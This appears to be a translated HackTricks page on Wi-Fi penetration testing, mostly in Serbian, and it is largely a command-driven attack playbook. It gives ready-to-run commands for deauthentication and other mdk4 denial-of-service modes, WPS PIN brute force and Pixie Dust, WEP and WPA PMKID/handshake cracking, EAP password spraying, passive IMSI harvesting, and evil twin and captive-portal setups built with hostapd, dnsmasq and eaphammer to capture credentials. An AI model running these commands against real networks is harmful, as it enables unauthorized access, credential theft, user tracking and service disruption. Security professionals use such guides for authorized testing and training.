Pentesting Wifi

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Wifi osnovne komande

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Alati

Hijacker & NexMon (Android interni Wi-Fi)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Pokrenite airgeddon koristeći docker

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

From: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

Može izvesti Evil Twin, KARMA i Known Beacons napade i zatim koristiti phishing template da dobije stvarnu lozinku mreže ili presretne social network credentials.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Ovaj alat automatizuje WPS/WEP/WPA-PSK napade. Automatski će:

• Postaviti interfejs u monitor mode
• Skenirati moguće mreže - i dozvoliti ti da izabereš metu/metu(e)
• Ako je WEP - pokrenuti WEP napade
• Ako je WPA-PSK
• Ako je WPS: Pixie dust attack i bruteforce attack (pazi — brute-force attack može potrajati dugo). Primeti da ne pokušava null PIN ili database/generated PINs.
• Pokušati da uhvati PMKID sa AP-a da bi ga crack-ovao
• Pokušati deauthenticate klijente AP-a da bi uhvatio handshake
• Ako PMKID ili Handshake, pokušati bruteforce koristeći top5000 lozinki.

Pregled napada

• DoS
• Deauthentication/disassociation – Isključiti sve (ili specifičan ESSID/Client)
• Random fake APs – Sakriti mreže, moguće rušenje skenera
• Overload AP – Pokušati “ubiti” AP (obično nije previše korisno)
• WIDS – Igrati se sa IDS-om
• TKIP, EAPOL – Neki specifični napadi za DoS nekih AP-ova
• Cracking
• Crack WEP (više alata i metoda)
• WPA-PSK
• WPS pin “Brute-Force”
• WPA PMKID bruteforce
• [DoS +] WPA handshake capture + Cracking
• WPA-MGT
• Username capture
• Bruteforce Credentials
• Evil Twin (with or without DoS)
• Open Evil Twin [+ DoS] – Korisno za hvatanje captive portal creds i/ili izvođenje LAN napada
• WPA-PSK Evil Twin – Korisno za mrežne napade ako znaš lozinku
• WPA-MGT – Korisno za hvatanje korporativnih credentials
• KARMA, MANA, Loud MANA, Known beacon
• + Open – Korisno za hvatanje captive portal creds i/ili izvođenje LAN napada
• + WPA – Korisno za hvatanje WPA handshakes

Kratke napomene za Open / OWE mreže

• Passive capture na open SSID-ovima i dalje radi sa monitor mode i tcpdump:

iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap

• OWE (Opportunistic Wireless Encryption) izvodi razmenu ključeva po stanici (no PSK), tako da su air frames šifrovani čak i na “open” SSID-ovima. Pošto je zasnovan na WPA3, takođe sprovodi 802.11w PMF, koji blokira spoofed deauth/disassoc frames.
• OWE ne autentifikuje joinere: bilo ko može da se associate, zato verify client isolation umesto da verujete marketinškim tvrdnjama. Bez isolation, ARP spoofing ili responder-style poisoning na lokalnom L2 i dalje funkcioniše.
• Evil Twin ostaje izvediv na open/OWE SSID-ovima predstavljajući jači signal; PMF samo uklanja deauth prečicu. Ako žrtve prihvate falsifikovani TLS cert, potpuni HTTP(S) MitM je ponovo moguć.
• Broadcast poisoning na open guest Wi-Fi lako daje creds/hashes (LLMNR/NBT-NS/mDNS). Vidi:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

DOS

Deauthentication Packets

Opis preuzet sa here:.

Deauthentication attacks, a prevalent method in Wi-Fi hacking, involve forging “management” frames to forcefully disconnect devices from a network. These unencrypted packets deceive clients into believing they are from the legitimate network, enabling attackers to collect WPA handshakes for cracking purposes or to persistently disrupt network connections. This tactic, alarming in its simplicity, is widely used and has significant implications for network security.

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0 znači deauthentication
• 1 je broj deauths koje treba poslati (možete poslati više ako želite); 0 znači slati ih kontinuirano
• -a 00:14:6C:7E:40:80 je MAC adresa access point-a
• -c 00:0F:B5:34:30:30 je MAC adresa klijenta koji treba deauthenticate; ako je ovo izostavljeno, šalje se broadcast deauthentication (ne radi uvek)
• ath0 je ime interfejsa

Disassociation Packets

Disassociation packets, slični deauthentication packets, su tip management frame koji se koristi u Wi-Fi mrežama. Ovi paketi služe da prekinu vezu između uređaja (kao što su laptop ili smartphone) i access point-a (AP). Glavna razlika između disassociation i deauthentication leži u scenarijima njihove upotrebe. Dok AP emituje deauthentication packets to remove rogue devices explicitly from the network, disassociation packets are typically sent when the AP is undergoing a shutdown, restart, or relocating, čime je potrebno isključiti sve povezane čvorove.

Ovaj napad se može izvesti pomoću mdk4(mode “d”):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Još DOS napada pomoću mdk4

U here.

ATTACK MODE b: Beacon Flooding

Šalje beacon frames kako bi prikazao fake APs klijentima. Ovo ponekad može srušiti network scanners i čak drivers!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

Slanje authentication frames svim dostupnim Access Points (APs) u dometu može preopteretiti te APs, naročito kada je uključen veliki broj clients. Ovaj intenzivan saobraćaj može uzrokovati nestabilnost sistema, zbog čega se neki APs zamrznu ili čak resetuju.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

REŽIM NAPADA p: SSID Probing and Bruteforcing

Probing Access Points (APs) proverava da li je SSID pravilno otkriven i potvrđuje domet AP-a. Ova tehnika, u kombinaciji sa bruteforcing hidden SSIDs sa ili bez wordlist-a, pomaže u identifikovanju i pristupanju skrivenim mrežama.

REŽIM NAPADA m: Michael Countermeasures Exploitation

Slanje nasumičnih ili dupliranih paketa u različite QoS redove može pokrenuti Michael Countermeasures na TKIP APs, što dovodi do privremenog isključivanja AP-a na jednu minutu. Ova metoda je efikasna DoS (Denial of Service) taktika.

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Preplavljivanje AP-a sa EAPOL Start frames stvara lažne sesije, preopterećujući AP i onemogućavajući legitimne klijente. Alternativno, injektovanje lažnih EAPOL Logoff messages prisilno prekida veze klijenata; obe metode efikasno ometaju mrežnu uslugu.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: Napadi na IEEE 802.11s mesh mreže

Različiti napadi na upravljanje vezama i rutiranje u mesh mrežama.

ATTACK MODE w: Zbunjenost WIDS-a

Povezivanje klijenata sa više WDS čvorova ili lažnih rogue APs može manipulisati Intrusion Detection and Prevention Systems, stvarajući konfuziju i potencijalnu zloupotrebu sistema.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

REŽIM NAPADA f: Packet Fuzzer

Packet fuzzer koji sadrži raznovrsne izvore paketa i sveobuhvatan skup modifikatora za manipulaciju paketima.

Airggedon

Airgeddon nudi većinu napada pomenutih u prethodnim komentarima:

WPS

WPS (Wi-Fi Protected Setup) pojednostavljuje proces povezivanja uređaja na ruter, ubrzavajući i olakšavajući podešavanje za mreže šifrovane WPA ili WPA2 Personal. Neefikasan je protiv lako kompromitovane WEP zaštite. WPS koristi 8-cifreni PIN, proveravan u dve polovine, zbog čega je podložan brute-force napadima zbog ograničenog broja kombinacija (oko 11.000 mogućnosti).

WPS Bruteforce

Postoje 2 glavna alata za izvođenje ovog napada: Reaver i Bully.

• Reaver je dizajniran kao robustan i praktičan alat za napad protiv WPS, i testiran je protiv širokog spektra access point-ova i WPS implementacija.
• Bully je nova implementacija WPS brute force napada, napisana u C. Ima nekoliko prednosti u odnosu na originalni reaver kod: manje zavisnosti, poboljšane performanse memorije i CPU-a, ispravno rukovanje endianness-om, i robusniji skup opcija.

Napad iskorišćava ranjivost WPS PIN-a, naročito izlaganje prvih četiri cifre i ulogu poslednje cifre kao checksum-a, što olakšava brute-force napad. Međutim, odbrane protiv brute-force napada, poput blokiranja MAC adresa agresivnih napadača, zahtevaju rotaciju MAC adresa da bi se napad nastavio.

Po pribavljanju WPS PIN-a pomoću alata kao što su Bully ili Reaver, napadač može izvesti dedukciju WPA/WPA2 PSK-a, obezbeđujući perzistentan pristup mreži.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

Ovaj rafinirani pristup cilja WPS PINs koristeći poznate ranjivosti:

1. Pre-otkriveni PINs: Koristite bazu podataka poznatih PINs povezanih sa određenim proizvođačima koji su poznati po upotrebi uniformnih WPS PINs. Ova baza povezuje prva tri okteta MAC-addresses sa verovatnim PINs za te proizvođače.
2. Algoritmi za generisanje PIN-ova: Iskoristite algoritme kao što su ComputePIN i EasyBox, koji izračunavaju WPS PINs na osnovu MAC-address AP-a. Arcadyan algoritam dodatno zahteva device ID, dodajući nivo procesu generisanja PINs.

WPS Pixie Dust attack

Dominique Bongard je otkrio grešku u nekim Access Points (APs) vezano za kreiranje tajnih kodova, poznatih kao nonces (E-S1 i E-S2). Ako se ovi nonces mogu otkriti, cracking AP-ovog WPS PIN postaje lak. AP otkriva PIN unutar posebnog koda (hash) da dokaže da je legitiman i nije fake (rogue) AP. Ovi nonces su ustvari “ključevi” za otvaranje “sefa” koji sadrži WPS PIN. Više o tome može se naći here.

Jednostavno rečeno, problem je u tome što neki APs nisu koristili dovoljno nasumične ključeve za enkripciju PIN-a tokom procesa konekcije. To čini PIN ranjivim na pogađanje izvan mreže (offline brute force attack).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Ako ne želite prebaciti uređaj u monitor mode, ili ako reaver i bully imaju neki problem, možete probati OneShot-C. Ovaj alat može izvesti Pixie Dust attack bez potrebe za prebacivanjem u monitor mode.

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

Neki loše dizajnirani sistemi čak dozvoljavaju da Null PIN (prazan ili nepostojeći PIN) omogući pristup, što je prilično neuobičajeno. Alat Reaver može testirati ovu ranjivost, za razliku od Bully.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Sve predložene WPS napade možete lako izvesti koristeći airgeddon.

• 5 i 6 vam omogućavaju da probate vaš prilagođeni PIN (ako ga imate)
• 7 i 8 izvršavaju Pixie Dust attack
• 13 vam omogućava da testirate NULL PIN
• 11 i 12 će prikupiti PIN-ove povezane sa izabranim AP iz dostupnih baza podataka i generisati moguće PIN-ove koristeći: ComputePIN, EasyBox i opciono Arcadyan (preporučeno, zašto ne?)
• 9 i 10 će testirati svaki mogući PIN

WEP

Zašto propada

• RC4 seed je samo IV (24 bits) + shared key. IV je cleartext, mali (2^24), i brzo se ponavlja, pa ciphertexts sa istim IV ponovo koriste isti keystream.
• XORing two ciphertexts with the same keystream leaks PlaintextA ⊕ PlaintextB; predvidljivi headers + RC4 KSA biases (FMS) vam omogućavaju da “glasate” bajtove ključa. PTW optimizuje ovo koristeći ARP traffic da smanji zahteve na desetine hiljada paketa umesto miliona.
• Integritet je samo CRC32 (linearno/bez ključa), tako da napadač može da menja bitove i ponovo izračuna CRC32 bez ključa → packet forgery/replay/ARP injection dok čeka IV-e.

Praktičan break je determinističan:

airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon  # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap  # PTW attack recovers key once IV threshold is met

Airgeddon i dalje dolazi sa “All-in-One” WEP workflow ako više volite vođeni UI.

WPA/WPA2 PSK

PMKID

U 2018. godini, hashcat revealed novu metodu napada, jedinstvenu jer zahteva samo jedan paket i ne zahteva da bilo koji klijent bude povezan na ciljni AP — dovoljna je interakcija između napadača i AP-a.

Mnogi moderni ruteri dodaju opciono polje u prvi EAPOL okvir tokom asocijacije, poznato kao Robust Security Network. Ovo uključuje PMKID.

Kao što originalni post objašnjava, PMKID se kreira koristeći poznate podatke:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

S obzirom da je “PMK Name” konstantan, znamo BSSID AP-a i station-a, i PMK je identičan onom iz potpunog 4-way handshake, hashcat može iskoristiti ove informacije da crack-uje PSK i povrati passphrase!

Da biste prikupili ove informacije i lokalno bruteforce-ovali lozinku, možete uraditi:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

Uhvaćeni PMKIDs biće prikazani u console i takođe sačuvani u _ /tmp/attack.pcap_
Sada konvertuj capture u hashcat/john format i crack it:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Imajte na umu da format ispravnog hash-a sadrži 4 dela, kao: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 Ako vaš sadrži samo 3 dela, onda je neispravan (PMKID capture nije bio validan).

Imajte u vidu da hcxdumptool takođe capture handshakes (nešto ovako će se pojaviti: MP:M1M2 RC:63258 EAPOLTIME:17091). Možete pretvoriti handshakes u hashcat/john format koristeći cap2hccapx

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

I have noticed that some handshakes captured with this tool couldn’t be cracked even knowing the correct password. I would recommend to capture handshakes also via traditional way if possible, or capture several of them using this tool.

Handshake snimanje

Napad na WPA/WPA2 mreže može se izvesti hvatanjem handshake i pokušajem da se crack-uje password offline. Ovaj proces uključuje praćenje komunikacije određene mreže i BSSID na određenom channel. Evo pojednostavljenog vodiča:

1. Identifikujte BSSID, channel, i connected client ciljane mreže.
2. Koristite airodump-ng za praćenje mrežnog saobraćaja na navedenom channel i BSSID, u nadi da ćete uhvatiti handshake. Komanda će izgledati ovako:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

3. Da biste povećali šansu za hvatanje handshake-a, na kratko prekinite vezu klijenta sa mreže kako biste ga primorali na ponovnu autentifikaciju. Ovo se može uraditi koristeći komandu aireplay-ng, koja šalje deauthentication packets klijentu:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Imajte na umu da, pošto je klijent bio deauthenticated, može pokušati da se poveže na drugi AP ili, u drugim slučajevima, na drugu network.

Kada se u airodump-ng pojave informacije o handshake, to znači da je handshake uhvaćen i da možete prestati da slušate:

Kada je handshake uhvaćen, možete ga crack pomoću aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Proveri da li fajl sadrži handshake

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Ako ovaj alat pronađe nepotpun handshake za ESSID pre nego što pronađe kompletan, neće detektovati važeći.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

Brže online pogađanje PSK-a preko wpa_supplicant ctrl socket (no clients/PMKID)

Kada nema clients u blizini i AP odbija PMKID, možete iterativno isprobavati PSK-ove online bez ponovnog pokretanja supplicants:

• Patch wpa_supplicant.c da forsirate dur = 0; u logici backoff-a za auth failure (oko ssid->auth_failures), čime se efektivno onemogućava timer za temporary-disable.
• Pokrenite jedan daemon sa control socket-om:

# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1

wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf

• Upravljaj njime preko kontrolnog interfejsa, ponovo koristeći isti scan i network:

ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED

Mala petlja u Pythonu koja čita socket događaje (CTRL-EVENT-CONNECTED / CTRL-EVENT-DISCONNECTED) može da testira ~100 pokušaja za ~5 minuta bez dodatnog vremena potrošenog na skeniranje. Ipak, i dalje je bučno i detektabilno, ali izbegava restartovanje procesa za svaki pokušaj i kašnjenja zbog backoff-a.

WPA Enterprise (MGT)

U enterprise WiFi okruženjima naići ćete na različite metode autentifikacije, od kojih svaka pruža različite nivoe bezbednosti i mogućnosti upravljanja. Kada koristite alate kao što je airodump-ng za pregled mrežnog saobraćaja, možete primetiti identifikatore za ove vrste autentifikacije. Neke uobičajene metode uključuju:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• Ova metoda podržava hardware token-e i one-time password-e unutar EAP-PEAP. Za razliku od MSCHAPv2, ne koristi peer challenge i šalje lozinke u plaintext-u ka access point-u, što predstavlja rizik za downgrade napade.

2. EAP-MD5 (Message Digest 5):

• Podrazumeva slanje MD5 heša lozinke od klijenta. Nije preporučljivo zbog ranjivosti na dictionary napade, nedostatka autentifikacije servera i nemogućnosti generisanja session-specific WEP ključeva.

3. EAP-TLS (Transport Layer Security):

• Koristi i client-side i server-side sertifikate za autentifikaciju i može dinamički generisati user-based i session-based WEP ključeve za sigurnu komunikaciju.

4. EAP-TTLS (Tunneled Transport Layer Security):

• Pruža mutual authentication kroz enkriptovani tunel, zajedno sa metodom za izvedbu dinamičkih, po-korisniku, po-seansi WEP ključeva. Zahteva samo server-side sertifikate, dok klijenti koriste credentials.

5. PEAP (Protected Extensible Authentication Protocol):

• Funkcioniše slično EAP-u tako što kreira TLS tunel za zaštićenu komunikaciju. Omogućava upotrebu slabijih autentifikacionih protokola iznad EAP zbog zaštite koju pruža tunel.
• PEAP-MSCHAPv2: Često nazivan PEAP, kombinuje ranjivi MSCHAPv2 challenge/response mehanizam sa zaštitnim TLS tunelom.
• PEAP-EAP-TLS (or PEAP-TLS): Slično EAP-TLS ali inicira TLS tunel pre razmene sertifikata, pružajući dodatni nivo bezbednosti.

You can find more information about these authentication methods here and here.

Username Capture

Čitajući https://tools.ietf.org/html/rfc3748#page-27 izgleda da ako koristite EAP “Identity” messages moraju biti supported, i da će korisničko ime biti poslato u jasno u “Response Identity” porukama.

Čak i koristeći jednu od najsigurnijih autentifikacionih metoda: PEAP-EAP-TLS, moguće je uhvatiti username poslat u EAP protokolu. Da biste to uradili, snimite authentication komunikaciju (pokrenite airodump-ng na kanalu i wireshark na istom interfejsu) i filtrirajte pakete po eapol.
Unutar “Response, Identity” paketa pojaviće se korisničko ime klijenta.

Anonymous Identities

Sakrivanje identiteta podržano je i u EAP-PEAP i u EAP-TTLS. U kontekstu WiFi mreže, EAP-Identity zahtev obično inicira access point (AP) tokom procesa asociacije. Da bi se zaštitila anonimnost korisnika, odgovor EAP klijenta na korisnikovom uređaju sadrži samo osnovne informacije potrebne početnom RADIUS serveru za obradu zahteva. Ovaj koncept ilustruju sledeći scenariji:

• EAP-Identity = anonymous
• U ovom scenariju svi korisnici koriste pseudonim “anonymous” kao svoj user identifier. Početni RADIUS server funkcioniše kao EAP-PEAP ili EAP-TTLS server, odgovoran za upravljanje server-side delom PEAP ili TTLS protokola. Inner (protected) autentifikacioni metod se zatim ili obrađuje lokalno ili delegira na udaljeni (home) RADIUS server.
• EAP-Identity = anonymous@realm_x
• U ovoj situaciji, korisnici iz različitih realm-ova skrivaju svoje identitete dok ukazuju na svoje odgovarajuće realm-ove. Ovo omogućava početnom RADIUS serveru da proksira EAP-PEAP ili EAP-TTLS zahteve ka RADIUS serverima u njihovim home realm-ovima, koji deluju kao PEAP ili TTLS serveri. Početni RADIUS server tada funkcioniše samo kao RADIUS relay node.
• Alternativno, početni RADIUS server može funkcionisati kao EAP-PEAP ili EAP-TTLS server i ili obraditi protected authentication method ili ga proslediti drugom serveru. Ova opcija omogućava konfiguraciju različitih politika za različite realm-ove.

U EAP-PEAP, nakon što se TLS tunel uspostavi između PEAP servera i PEAP klijenta, PEAP server inicira EAP-Identity zahtev i prenosi ga kroz TLS tunel. Klijent odgovara na ovaj drugi EAP-Identity zahtev slanjem EAP-Identity odgovora koji sadrži pravi identitet korisnika kroz enkriptovani tunel. Ovaj pristup efikasno sprečava otkrivanje stvarnog identiteta korisnika bilo kome ko prisluškuje 802.11 saobraćaj.

EAP-TTLS prati nešto drugačiju proceduru. Kod EAP-TTLS, klijent se obično autentifikuje koristeći PAP ili CHAP, osigurano TLS tunelom. U tom slučaju, klijent uključuje User-Name atribut i ili Password ili CHAP-Password atribut u inicijalnoj TLS poruci poslatoj nakon uspostavljanja tunela.

Bez obzira na izabrani protokol, PEAP/TTLS server dobija informaciju o stvarnom identitetu korisnika nakon što je TLS tunel uspostavljen. Stvarni identitet može biti predstavljen kao user@realm ili jednostavno user. Ako PEAP/TTLS server takođe odgovara za autentifikaciju korisnika, on sada poseduje korisnikov identitet i nastavlja sa autentifikacionim metodom zaštićenim TLS tunelom. Alternativno, PEAP/TTLS server može proslediti novi RADIUS zahtev korisnikovom home RADIUS serveru. Ovaj novi RADIUS zahtev izostavlja PEAP ili TTLS protokolsku slojevitost. U slučajevima gde je protected authentication method EAP, unutrašnje EAP poruke se prenose home RADIUS serveru bez EAP-PEAP ili EAP-TTLS omotača. User-Name atribut izlazne RADIUS poruke sadrži pravi identitet korisnika, zamenjujući anonymous User-Name iz ulaznog RADIUS zahteva. Kada je protected authentication method PAP ili CHAP (podržano samo od strane TTLS), User-Name i drugi authentication atributi izvučeni iz TLS payload-a se zamenjuju u izlaznoj RADIUS poruci, zamenjujući anonymous User-Name i TTLS EAP-Message atribute iz ulaznog RADIUS zahteva.

For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) curenje identiteta (otkrivanje IMSI)

SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X can leak the permanent subscriber identifier (IMSI) in cleartext during the unauthenticated identity phase if the deployment doesn’t implement pseudonyms/protected identities or a TLS tunnel around the inner EAP.

Where the leak happens (high level):

• 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
• Authenticator sends EAP-Request/Identity.
• Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
• Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
• Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

</details>

Napomene:
- Radi pre nego što se uspostavi bilo koji TLS tunel ako implementacija koristi gol EAP‑SIM/AKA bez zaštićenih identiteta/pseudonima.
- Otkrivena vrednost je trajni identifikator vezan za SIM pretplatnika; njegovo prikupljanje omogućava dugoročno praćenje i dalja zloupotrebljavanja u telekomunikacijama.

Uticaj
- Privatnost: trajno praćenje korisnika/uređaja iz pasivnih Wi‑Fi snimaka na javnim mestima.
- Olakšavanje telekom zloupotreba: sa IMSI, napadač sa SS7/Diameter pristupom može upitivati lokaciju ili pokušati presretanje poziva/SMS i krađu MFA.

Ublažavanje / na šta treba obratiti pažnju
- Proverite da klijenti koriste anonimne spoljne identitete (pseudonime) za EAP‑SIM/AKA u skladu sa smernicama 3GPP (npr. 3GPP TS 33.402).
- Preferirajte tunelovanje faze identiteta (npr. EAP‑TTLS/PEAP koji nosi unutrašnji EAP‑SIM/AKA) tako da IMSI nikada ne bude poslat u jasnom tekstu.
- Snimci paketa asocijacije/autentifikacije nikada ne bi trebalo da otkriju sirovi IMSI u EAP-Response/Identity.

Povezano: Eksploatacija telekom signalizacije sa uhvaćenim mobilnim identifikatorima
<a class="content_ref" href="../pentesting-network/telecom-network-exploitation.md"><span class="content_ref_label">Telecom Network Exploitation</span></a>

### EAP-Bruteforce (password spray)

Ako se od klijenta očekuje da koristi **username and password** (napomena: **EAP-TLS won't be valid** u ovom slučaju), možete pokušati da dobijete **listu** **usernames** (videti sledeći deo) i **passwords** i pokušate da **bruteforce** pristup koristeći [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer).
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

apt-get install dnsmasq #Manages DHCP and DNS

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

dnsmasq -C dnsmasq.conf -d

apt-get install hostapd

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

--negotiate weakest

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

